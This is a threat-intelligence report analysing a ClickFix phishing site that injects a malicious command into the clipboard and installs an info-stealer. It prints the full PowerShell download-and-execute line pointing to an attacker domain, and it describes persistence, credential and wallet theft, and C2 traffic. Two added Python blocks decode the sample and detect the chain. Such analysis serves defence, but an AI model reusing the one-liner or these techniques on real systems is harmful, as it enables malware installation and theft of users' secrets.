
Threat Intelligence: Clickfix Phishing Attack

Aug 22, 2025

Authors: Joker & Thinking
Editors: KrsMt. & Liz

Background

Recently, the MistEye security monitoring system detected a phishing website leveraging the Clickfix phishing attack technique. Such phishing sites typically imitate common bot verification features used by legitimate websites to trick victims into executing malicious commands, leading to the download of malware.

Once relevant malicious samples were obtained, the SlowMist security team immediately initiated an in-depth analysis.

Analysis

When accessing the phishing site, users are presented with what appears to be a legitimate bot verification checkbox.


When victims click the checkbox to start the verification, the phishing site silently copies a malicious command into their clipboard. Victims are then prompted to press specific keys, which triggers the download and execution of the malware.


The frontend code shows that the program listens for postMessage events from iframes or parent/child windows. Once it receives the message turnstileSuccess, it calls the function copyTextSilently().


In index_1.html, the code monitors the checkbox. Once the victim interacts with it, the page sends a turnstileSuccess message to the parent page.


Clipboard Injection of Malicious Commands

In the copyTextSilently() function:

  • If the Clipboard API conditions are met, it directly calls Clipboard#writeText() to copy the malicious command.
  • Otherwise, it creates a hidden <textarea> element, inserts the command, uses execCommand() to copy it, and finally removes the element.

The code references command_win from the global window object, which is defined in the external script assets/command.js.


Within command.js, window.command_win is defined to download a malicious script from a remote server and execute it stealthily via PowerShell:

powershell -w h -c "
$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';
$p='$env:USERPROFILE\Music\d.ps1';
(New-Object System.Net.WebClient).DownloadFile($u,$p);
powershell -w h -ep bypass -f $p"

Clicking the VERIFY button also triggers copyTextSilently(). However, due to browser security restrictions, victims must click again on the page after pressing VERIFY for the malicious command to be copied successfully.


Analysis of the Malicious Script

The malicious PowerShell script processes an array $mmASoSdDL by joining it into a string, decoding it from Base64, and converting it into a JSON object.


Hidden Directory Creation

The script checks if a target directory exists. If not, it creates one and sets its attributes to Hidden and System.


Writing Malicious Files

The script iterates over the files array in the JSON, constructs full paths, decodes Base64-encoded binary data, and writes them into the hidden directory.
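To triage a dropper of this shape without running it, an analyst can rebuild the same decode chain in Python: join the array, Base64-decode it, parse the JSON, then decode each entry of its files array and hash it for IoC use. This example is added here and is not code from the report or from the sample; the JSON field names name and data, and the stand-in script it parses, are constructed assumptions.

```python
import base64
import hashlib
import json
import pathlib
import re

# Constructed stand-in for the dropper (not the real sample): the script joins an
# array named $mmASoSdDL into one string, Base64-decodes it and converts it to JSON.
# The JSON field names ("name", "data") are assumptions made for this example.
_CONFIG = {"files": [
    {"name": "trntl.exe", "data": base64.b64encode(b"MZ-constructed-stub").decode()},
    {"name": "trntl.dll", "data": base64.b64encode(b"constructed-dll-bytes").decode()},
]}
_BLOB = base64.b64encode(json.dumps(_CONFIG).encode()).decode()
SAMPLE_SCRIPT = (
    "$mmASoSdDL = @('" + "','".join(_BLOB[i:i + 24] for i in range(0, len(_BLOB), 24)) + "');\n"
    "$cfg = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
    "($mmASoSdDL -join ''))) | ConvertFrom-Json\n"
)

ARRAY_RE = re.compile(r"\$mmASoSdDL\s*=\s*@\((.*?)\)", re.S)


def extract_config(script: str) -> dict:
    """Rebuild the JSON config exactly as the script would, without executing it."""
    match = ARRAY_RE.search(script)
    if not match:
        raise ValueError("array $mmASoSdDL not found in script")
    chunks = re.findall(r"'([^']*)'", match.group(1))  # the quoted array elements
    return json.loads(base64.b64decode("".join(chunks)))


def list_files(script: str) -> list:
    """Return (name, size, sha256) for every file the dropper would write."""
    result = []
    for entry in extract_config(script).get("files", []):
        data = base64.b64decode(entry["data"])
        result.append((entry["name"], len(data), hashlib.sha256(data).hexdigest()))
    return result


def dump_files(script: str, outdir: str) -> list:
    """Write the embedded files into outdir; only the basename is kept so a
    crafted "name" cannot escape the output directory."""
    out = pathlib.Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    written = []
    for entry in extract_config(script).get("files", []):
        target = out / pathlib.PurePath(entry["name"].replace("\\", "/")).name
        target.write_bytes(base64.b64decode(entry["data"]))
        written.append(str(target))
    return written
```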


Persistence via Auto-Startup

A shortcut named trntl.lnk is created in the victim’s Startup folder, pointing to trntl.exe. The shortcut uses a system icon for disguise, ensuring the malware executes automatically at login or startup.


Delayed Execution

The script generates a temporary .cmd file with a random name, which uses rundll32 to launch the .exe. After a 60-second delay, the script executes it via cmd.exe /c, and deletes the .cmd file afterward to erase traces.
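Added example, not from the report: detection logic run over constructed process-creation events, covering the traits of the clipboard-injected one-liner shown earlier (hidden-window PowerShell, execution-policy bypass, a WebClient download cradle, a script dropped under the user profile) and the delayed-execution stage described here (a .cmd launched from a temp folder via cmd.exe /c, and rundll32 handed an .exe). The event field names, paths and URL are simplified assumptions.

```python
import re

# Constructed process-creation events in a simplified Sysmon-like shape
# (parent, image, cmd); they mirror the chain described in the report but are
# not sandbox output. The URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -w h -c \"$u='http://example.invalid/aTu.lim';"
            "$p='$env:USERPROFILE\\Music\\d.ps1';"
            "(New-Object System.Net.WebClient).DownloadFile($u,$p);"
            "powershell -w h -ep bypass -f $p\""},
    {"parent": "powershell.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c C:\\Users\\victim\\AppData\\Local\\Temp\\k3j9x.cmd"},
    {"parent": "cmd.exe", "image": "rundll32.exe",
     "cmd": "rundll32.exe C:\\Users\\victim\\AppData\\Roaming\\hdir\\trntl.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -NoProfile -Command Get-Process"},
]

# Traits of the clipboard-injected PowerShell one-liner; two or more together is the signal.
PS_RULES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "ep_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I),
    "download_cradle": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I),
    "script_under_profile": re.compile(r"\$env:USERPROFILE\\[^'\"\s]+\.ps1", re.I),
}


def classify(event: dict) -> set:
    """Return the set of suspicious traits one event exhibits."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmd"]
    args = cmd.partition(" ")[2]  # everything after the executable itself
    tags = set()
    if image == "powershell.exe":
        tags = {name for name, rx in PS_RULES.items() if rx.search(cmd)}
    elif image == "cmd.exe" and re.search(r"/c\s+\S*\\temp\\[^\\\s]+\.cmd\b", args, re.I):
        tags.add("temp_cmd_launch")  # the delayed-execution stage
    elif image == "rundll32.exe" and re.search(r"\.exe\b", args, re.I):
        tags.add("rundll32_launches_exe")  # rundll32 handed an .exe, not a DLL
    return tags


def alerts(events: list) -> list:
    """Indices and traits of the events worth escalating."""
    out = []
    for i, ev in enumerate(events):
        tags = classify(ev)
        if len(tags & set(PS_RULES)) >= 2 or tags - set(PS_RULES):
            out.append((i, sorted(tags)))
    return out
```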


Malicious Script Code

Below are the main portions of the malicious script (the original code was a single continuous block; line breaks have been added for readability).


Dynamic Analysis

The malicious executable was uploaded to VirusTotal, where it was flagged as malware.

VirusTotal report: https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection

Process Injection

The malware injects code into a legitimate process (regasm.exe), modifying its execution flow so that the benign process runs malicious payloads.


Sensitive Data Collection

Sandbox analysis indicates the malware exhibits typical info-stealing behavior, including:

  • Extracting sensitive data from browsers (Chrome, Chromium, Opera, etc.), such as cookies, saved passwords, and crypto wallets.
  • Targeting email clients (Thunderbird, Windows Mail) to steal accounts and messages.
  • Locating crypto wallet files to steal private keys or wallet data.
  • Extracting FTP credentials.

Keylogging

The malware includes a keylogger to capture keystrokes in real time, including usernames and passwords.


C2 Communication

The malware retrieves its C2 configuration from Pastebin and communicates with the malicious IP 217[.]12[.]204[.]47 on ports 9000 and 443, which allows it to exfiltrate stolen data and receive commands.

  • Malicious Pastebin URL: https[:]//pastebin[.]com/raw/rzARed3W
  • IP & URL already flagged as malicious on VirusTotal, with the IP geolocated to Greece:
    https://www.virustotal.com/gui/ip-address/217.12.204.47
    https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d

Conclusion

This phishing attack leverages social engineering techniques — tricking users into executing malicious commands, ultimately leading to malware installation. Victims who unknowingly run these commands risk theft of sensitive data, including crypto wallet private keys.

The SlowMist security team urges developers and users to remain vigilant when encountering unfamiliar commands. If debugging or command execution is necessary, it should only be performed in isolated environments without sensitive data.

IoCs

IPs

  • 217[.]12[.]204[.]47

SHA256

  • 4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 — aTu.lim
  • cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 — trntl.exe
  • 60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 — command.js

URLs

  • https[:]//pastebin[.]com:443/raw/rzARed3W
  • 217[.]12[.]204[.]47:443
  • 217[.]12[.]204[.]47:9000
  • http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
  • http[:]//electri[.]billregulator[.]com/aTu.lim

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
